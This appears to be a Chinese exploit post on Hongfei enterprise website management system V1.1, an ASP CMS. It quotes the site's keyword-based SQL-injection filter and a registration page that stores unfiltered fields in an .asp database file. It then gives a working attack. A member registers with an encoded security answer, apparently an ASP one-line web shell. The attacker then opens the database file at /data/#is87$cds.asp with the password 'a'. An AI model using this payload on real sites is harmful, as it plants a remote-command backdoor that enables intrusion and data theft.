宏飞企业网站管理系统漏洞

作者：hack1990 时间：11-09-20 阅读数：685人阅读

'\is87_sql.asp
<%
    Dim GetFlag Rem(提交方式)
    Dim ErrorSql Rem(非法字符)
    '..略
    ErrorSql = "'~;~and~(~)~exec~update~count~*~%~chr~mid~master~truncate~char~declare" Rem(每个敏感字符或者词语请使用半角 "~" 格开)
    ErrorSql = split(ErrorSql,"~")
    '..略
        If Instr(LCase(Request.QueryString(RequestKey)),ErrorSql(ForI))<>0 Then
        response.write "<script>alert(""警告:\n请不要尝试非法注入！！"");history.go(-1);</script>"
    '..略
        response.write "<script>alert(""警告:\n请不要尝试非法注入！！"");history.go(-1);</script>"
    '..略
%>

过滤问题。

 
宏飞企业网站管理系统_V1.1 漏洞
'\member\register_pass.asp 
            <!--#include file="../is87_sql.asp"-->  
            <% 
            dim u,i,letters,ip,useradmin,userpassword,userpassword2,sh,zsname,sex,wen,da,gsname,gsadd,youbian,tel,fax,sj,mail,wz,VerifyCode 
            ip=request.servervariables("remote_addr") 
            useradmin=replace(trim(request("useradmin")),"'","")  
            '..略  
            zsname=request.form("zsname") 
            '..略 
            rs("userpassword")=md5(request.form("userpassword")) 
            rs("zsname")=zsname 
            rs("sex")=sex 
            Response.Write "<script>alert('恭喜!注册成功，返回首页进行登陆！');window.location.href='/index.asp';</script>"  
            %> 
             
宏飞企业网站管理系统_V1.1 漏洞

直接写入数据库。

注册会员，密码保护答案：┼攠數畣整爠煥敵瑳∨≡┩>

 
宏飞企业网站管理系统_V1.1 漏洞
http://127.0.0.1\data 
            \#is87$cds.asp
宏飞企业网站管理系统_V1.1 漏洞

密码：a

# Nmap Security Scanner 7.0

上一篇：深山网站管理系统漏洞

下一篇：风渡科技ASP网上购物v11.919漏洞

宏飞企业网站管理系统漏洞

相关文章

发表评论